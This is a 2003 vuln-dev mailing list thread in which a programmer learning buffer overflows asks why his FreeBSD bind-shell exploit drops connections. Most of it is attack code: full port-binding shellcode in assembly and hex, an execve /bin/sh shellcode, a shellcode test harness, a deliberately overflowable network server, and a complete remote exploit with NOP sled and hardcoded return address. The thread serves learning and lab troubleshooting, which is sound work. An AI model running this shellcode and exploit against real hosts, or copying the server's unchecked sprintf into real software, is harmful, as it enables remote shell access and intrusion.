Vulnerability Development mailing list archives
RE: sample buffer overflow exploit problem
From: Ganbold <ganbold () micom mng net>
Date: Tue, 30 Sep 2003 10:07:50 +0900
Hi,Thanks for reply. I tried port binding shellcode as application and it works fine.
But when I try it in exploit, it binds port to shell but whenever I connect to it it just closes connection.
Following is the code: /* * FreeBSD shellcode - binds /bin/sh to a port * * Claes M. Nyberg 20020619 * * <cmn () darklab org>, <md0claes () mdstud chalmers se> */ #include <string.h> /********************************************************************* void main(void) { __asm__(" # Length of address pushl $0x10 # addrlen = 16, sizeof(struct sockaddr_in) movl %esp, %ecx # ecx = &addrlen # Client address subl $0x10, %esp # 16 bytes of stack-crap movl %esp, %ebx # ebx = &client # Zero out and set up server address xorl %eax, %eax # eax = 0 pushl %eax pushl %eax # sin_zero[8] pushl %eax # sin_addr.s_addr = INADDR_ANY pushw $0x3930 # Port (12345) movb $0x20, %ah # sin_family = AF_INET; pushw %ax # movl %esp, %edx # edx = &server # Create socket pushl $0x6 # IPPROTO_TCP pushl $0x1 # SOCK_STREAM pushl $0x2 # AF_INET pushl %eax # Dummy xorb %ah, %ah # ah = 0 movb $0x61, %al # eax = 97 = SYS_socket int $0x80 # socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); movl %eax, %edi # edi = (server_fd) server socket descriptor # Bind address to socket pushl $0x10 # addrlen (16) pushl %edx # &server pushl %eax # eax (server_fd) pushl %eax # Dummy movb $0x68, %al # eax = 104 = SYS_bind int $0x80 # bind(server_fd, &server, addrlen); # Listen xorl %eax, %eax # eax = 0 pushl %eax # backlog = 0 pushl %edi # (server_fd) server socket descriptor pushl %eax # Dummy addl $0x6a, %eax # eax = 106 = SYS_listen int $0x80 # listen(server_fd, 0); # Accept connection pushl %ecx # &addrlen pushl %ebx # &client pushl %edi # (server_fd) server socket descriptor pushl %eax # Dummy movb $0x1e, %al # eax = 30 = SYS_accept int $0x80 # accept(server_fd, &client, &addrlen); movl %eax, %ebx # ebx = (client_fd) client socket descriptor # Set up IO xorl %eax, %eax # eax = 0 pushl %eax # STDIN_FILENO pushl %ebx # client_fd pushl %eax # Dummy movb $0x5a, %al # eax = 90 = SYS_dup2 int $0x80 # dup2(client_fd, STDIN_FILENO); movb $0x1, %al # eax = 1 pushl %eax # STDOUT_FILENO pushl %ebx # client_fd pushl %eax # Dummy addl $0x59, %eax # eax += 89, eax = 90 = SYS_dup2 int $0x80 # dup2(client_fd, STDOUT_FILENO); movb $0x2, %al # eax = 2 pushl %eax # STDERR_FILENO pushl %ebx # client_fd pushl %eax # Dummy addl $0x58, %eax # eax += 88, eax = 90 = SYS_dup2 int $0x80 # dup2(client_fd, STDERR_FILENO); # Execve /bin/sh xorl %eax, %eax # eax = 0 pushl %eax # string ends with NULL pushl $0x68732f2f # push 'hs//' (//sh) pushl $0x6e69622f # push 'nib/' (/bin) movl %esp, %ebx # ebx = argv[0] = string addr pushl %eax # argv[1] = NULL pushl %ebx # argv[0] = /bin//sh movl %esp, %edx # edx = &argv[0] pushl %eax # envp = NULL pushl %edx # &argv[0] pushl %ebx # *path = argv[0] pushl %eax # Dummy movb $0x3b, %al # al = 59 = SYS_execve int $0x80 # execve(argv[0], argv, NULL) # Exit if SYS_execve failed xorl %eax, %eax # eax = 0 inc %eax # eax = 1 pushl %eax # Exit value = 1 pushl %eax # Dummy int $0x80 # exit(1) (eax = 1 = SYS_exit) "); } ******************************************************************/ static char freebsd_code[] = /* Length of address */ "\x6a\x10" /* pushl $0x10 */ "\x89\xe1" /* movl %esp, %ecx */ /* Client address */ "\x83\xec\x10" /* subl $0x10, %esp */ "\x89\xe3" /* movl %esp, %ebx */ /* Zero out and set up server address */ "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\x66\x68\x30\x39" /* pushw $0x3930 << port (12345) */ "\xb4\x20" /* movb $0x20, %ah */ "\x66\x50" /* pushw %ax */ "\x89\xe2" /* movl %esp, %edx */ /* Create socket */ "\x6a\x06" /* pushl $0x6 */ "\x6a\x01" /* pushl $0x1 */ "\x6a\x02" /* pushl $0x2 */ "\x50" /* pushl %eax */ "\x30\xe4" /* xorb %ah, %ah */ "\xb0\x61" /* movb $0x61, %al */ "\xcd\x80" /* int $0x80 */ "\x89\xc7" /* movl %eax, %edi */ /* Bind address to socket */ "\x6a\x10" /* pushl $0x10 */ "\x52" /* pushl %edx */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\xb0\x68" /* movb $0x68, %al */ "\xcd\x80" /* int $0x80 */ /* Listen */ "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\x83\xc0\x6a" /* addl $0x6a, %eax */ "\xcd\x80" /* int $0x80 */ /* Accept connection */ "\x51" /* pushl %ecx */ "\x53" /* pushl %ebx */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xb0\x1e" /* movb $0x1e, %al */ "\xcd\x80" /* int $0x80 */ "\x89\xc3" /* movl %eax, %ebx */ /* Set up IO */ "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xb0\x5a" /* movb $0x5a, %al */ "\xcd\x80" /* int $0x80 */ "\xb0\x01" /* movb $0x1, %al */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\x83\xc0\x59" /* addl $0x59, %eax */ "\xcd\x80" /* int $0x80 */ "\xb0\x02" /* movb $0x2, %al */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\x83\xc0\x58" /* addl $0x58, %eax */ "\xcd\x80" /* int $0x80 */ /* Execve /bin/sh */ "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp, %ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe2" /* movl %esp, %edx */ "\x50" /* pushl %eax */ "\x52" /* pushl %edx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xb0\x3b" /* movb $0x3b, %al */ "\xcd\x80" /* int $0x80 */ /* Exit if SYS_execve failed */ "\x31\xc0" /* xorl %eax, %eax */ "\x40" /* inc %eax */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\xcd\x80"; /* int $0x80 */static char _freebsd_code[] = /* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39" "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd" "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83" "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53" "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50" "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0" "\x40\x50\x50\xcd\x80"; int main(void) { int *ret; ret = (int *)&ret +2; printf("Shellcode length: %d\n", strlen(_freebsd_code)); *ret = (int)_freebsd_code; return(1); } At 02:00 PM 9/29/2003 -0700, you wrote:
IMHO, try writing a plain app that does the same thing, and see if that works. It would narrow it down to a problem with system configuration, or a problem with your shell code. Just a guess... -----Original Message----- From: Ganbold [mailto:ganbold () micom mng net] Sent: Saturday, September 27, 2003 10:54 PM To: deepcode . Cc: vuln-dev () securityfocus com Subject: Re: sample buffer overflow exploit problem Hi, I'm trying to connect from same host where I run exploit and where daemon is running. So exploit seems bind port and afterwards when I'm trying to connect to port using : telnet localhost 12345 it just drops and program or port binding just ends. Should I try to connect it from different hosts? Ganbold At 11:37 PM 9/27/2003 -0300, you wrote: >You say that you can connect after the exploit, but then the connection >gets dropped immediately afterwards... is there a firewall in place? > >>From: Ganbold <ganbold () micom mng net> >>To: vuln-dev () securityfocus com >>Subject: sample buffer overflow exploit problem >>Date: Sat, 27 Sep 2003 16:54:59 +0900 >> >>Hi, >> >>I'm very new to buffer overflow exploit technics and my boss wants me to >>thoroughly understand >>how it works. I'm trying to exploit sample network server in FreeBSD 5.1 >>for this purpose. >>When I try to exploit using execve /bin/sh (shellcode1), it works and >>launches the shell in the remote machine. >>However when I try to use port binding shell code, it binds shell to the >>port, but when I try to connect to >>it, it just closes the connection. Also I can't connect to bind port >>after sending buffer using following code snippets: >>.............. >> printf("[-] Connecting to bindshell...\n"); >> remote.sin_family = AF_INET; >> remote.sin_addr = *((struct in_addr *)host->h_addr); >> remote.sin_port = htons(12345); >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) >> { >> close(s); >> fprintf(stderr, "Error: connect\n"); >> return -1; >> } >> exec_sh(s); >>............... >> >>I appreciate if somebody give me some help to solve this test problem. >>Is there anywhere I can find detailed explanation about buffer overflows >>and working sample network exploits? >>Is there anyway I can generate shellcodes in FreeBSD? >> >>I attached my sample server code and exploit code. >> >>thanks in advance, >> >>Ganbold Ts, >> >>senior programmer, >>Micom Co., Ltd >>Ulaanbaatar, >>Mongolia >> >> >> >>Following is network server code: >>---------------------------------------------------------------------- ---------------------------------------------------------- >>#include <stdio.h> >>#include <netinet/in.h> >>#include <netdb.h> >>#include <sys/socket.h> >>#include <sys/types.h> >>#include <errno.h> >> >>#define BUFFER_SIZE 1024 >>#define NAME_SIZE 2048 >> >>int handle(int c) >>{ >> char buffer[BUFFER_SIZE], name[NAME_SIZE]; >> int bytes; >> strcpy(buffer, "Your name?: "); >> bytes = send(c, buffer, strlen(buffer), 0); >> if (bytes == -1) >> return -1; >> bytes = recv(c, name, sizeof(name), 0); >> if (bytes == -1) >> return -1; >> name[bytes - 1] = '\0'; >> sprintf(buffer, "Hello %s, nice to meet you!\r\n", name); >> bytes = send(c, buffer, strlen(buffer), 0); >> if (bytes == -1) >> return -1; >> return 0; >>} >> >> >>int main(int argc, char *argv[]) >>{ >> int s, c, cli_size; >> struct sockaddr_in srv, cli; >> if (argc != 2) >> { >> fprintf(stderr, "usage: %s port\n", argv[0]); >> return 1; >> } >> s = socket(AF_INET, SOCK_STREAM, 0); >> if (s == -1) >> { >> perror("socket() failed"); >> return 2; >> } >> srv.sin_addr.s_addr = INADDR_ANY; >> srv.sin_port = htons( (unsigned short int) atol(argv[1])); >> srv.sin_family = AF_INET; >> if (bind(s, &srv, sizeof(srv)) == -1) >> { >> perror("bind() failed"); >> return 3; >> } >> if (listen(s, 3) == -1) >> { >> perror("listen() failed"); >> return 4; >> } >> for(;;) >> { >> c = accept(s, &cli, &cli_size); >> if (c == -1) >> { >> perror("accept() failed"); >> return 5; >> } >> fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr)); >> if (handle(c) == -1) >> fprintf(stderr, "%s: handle() failed", argv[0]); >> close(c); >> } >> return 0; >>} >>---------------------------------------------------------------------- ---------------------------------------------------------- >> >>Following is the sample exploit code: >>---------------------------------------------------------------------- ---------------------------------------------------------- >>#include <stdio.h> >>#include <netinet/in.h> >>#include <netdb.h> >>#include <sys/socket.h> >>#include <sys/types.h> >>#include <errno.h> >>#include <unistd.h> >> >>/* >> * FreeBSD shellcode - binds /bin/sh to a port 12345 >> * >> * Claes M. Nyberg 20020619 >> * >> * <cmn () darklab org>, <md0claes () mdstud chalmers se> >> */ >>char shellcode[] = /* port _______*/ >> >>"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\ x39" >> >>"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\ xcd" >> >>"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\ x83" >> >>"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\ x53" >> >>"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\ x50" >> >>"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\ x62" >> >>"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\ xc0" >> "\x40\x50\x50\xcd\x80"; >> >>/* >> * FreeBSD shellcode - execve /bin/sh >> * >> * Claes M. Nyberg 20020120 >> * >> * <cmn () darklab org>, <md0claes () mdstud chalmers se> >> */ >>char shellcode1[] = >> "\x31\xc0" /* xorl %eax, %eax */ >> "\x50" /* pushl %eax */ >> "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ >> "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ >> "\x89\xe3" /* movl %esp, %ebx */ >> "\x50" /* pushl %eax */ >> "\x53" /* pushl %ebx */ >> "\x89\xe2" /* movl %esp, %edx */ >> "\x50" /* pushl %eax */ >> "\x52" /* pushl %edx */ >> "\x53" /* pushl %ebx */ >> "\x50" /* pushl %eax */ >> "\xb0\x3b" /* movb $0x3b, %al */ >> "\xcd\x80" /* int $0x80 */ >> "\x31\xc0" /* xorl %eax, %eax */ >> "\x40" /* inc %eax */ >> "\x50" /* pushl %eax */ >> "\x50" /* pushl %eax */ >> "\xcd\x80"; /* int $0x80 */ >> >>#define RET 0xbfbffa48 >> >>int exec_sh(int sockfd) >>{ >> char snd[4096],rcv[4096]; >> fd_set rset; >> while(1) >> { >> FD_ZERO(&rset); >> FD_SET(fileno(stdin),&rset); >> FD_SET(sockfd,&rset); >> select(255,&rset,NULL,NULL,NULL); >> if(FD_ISSET(fileno(stdin),&rset)) >> { >> memset(snd,0,sizeof(snd)); >> fgets(snd,sizeof(snd),stdin); >> write(sockfd,snd,strlen(snd)); >> } >> if(FD_ISSET(sockfd,&rset)) >> { >> memset(rcv,0,sizeof(rcv)); >> if(read(sockfd,rcv,sizeof(rcv))<=0) >> exit(0); >> fputs(rcv,stdout); >> } >> } >>} >> >>int main(int argc, char *argv[]) { >> >> char buffer[1064]; >> int s,t, i, size; >> struct sockaddr_in remote; >> struct hostent *host; >> >> if(argc != 3) { >> printf("Usage: %s target-ip port\n", argv[0]); >> return -1; >> } >> >> // filling buffer with NOPs >> memset(buffer, 0x90, 1064); >> >> //copying shellcode into buffer >> memcpy(buffer+1001-sizeof(shellcode) , shellcode, >> sizeof(shellcode)); >> >> // the previous statement causes a unintential Nullbyte at >> buffer[1000] >> buffer[1000] = 0x90; >> >> // Copying the return address multiple times at the end of the >> buffer... >> for(i=1022; i < 1059; i+=4) { >> * ((int *) &buffer[i]) = RET; >> } >> >> buffer[1063] = 0x0; >> >> //getting hostname >> >> host=gethostbyname(argv[1]); >> if (host==NULL) >> { >> fprintf(stderr, "Unknown Host %s\n",argv[1]); >> return -1; >> } >> >> // creating socket... >> s = socket(AF_INET, SOCK_STREAM, 0); >> if (s < 0) >> { >> fprintf(stderr, "Error: Socket\n"); >> return -1; >> } >> remote.sin_family = AF_INET; >> remote.sin_addr = *((struct in_addr *)host->h_addr); >> remote.sin_port = htons(atoi(argv[2])); >> // connecting with destination host >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) >> { >> close(s); >> fprintf(stderr, "Error: connect\n"); >> return -1; >> } >> //sending exploit string >> size = send(s, buffer, sizeof(buffer), 0); >> if (size==-1) >> { >> close(s); >> fprintf(stderr, "sending data failed\n"); >> return -1; >> } >>/* >> printf("[-] Connecting to bindshell...\n"); >> remote.sin_family = AF_INET; >> remote.sin_addr = *((struct in_addr *)host->h_addr); >> remote.sin_port = htons(12345); >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) >> { >> close(s); >> fprintf(stderr, "Error: connect\n"); >> return -1; >> } >> exec_sh(s); >>*/ >> // closing socket >> close(s); >>} >> >>---------------------------------------------------------------------- ---------------------------------------------------------- >> >> > >_________________________________________________________________ >STOP MORE SPAM with the new MSN 8 and get 2 months FREE* >http://join.msn.com/?page=features/junkmail > >
Current thread:
- sample buffer overflow exploit problem Ganbold (Sep 27)
- Message not available
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Message not available
- Re: sample buffer overflow exploit problem upb (Sep 29)
- <Possible follow-ups>
- Re: sample buffer overflow exploit problem deepcode . (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem sohlow (Sep 29)
- Re: sample buffer overflow exploit problem Vade 79 (Sep 30)
- RE: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Gerardo Richarte (Sep 30)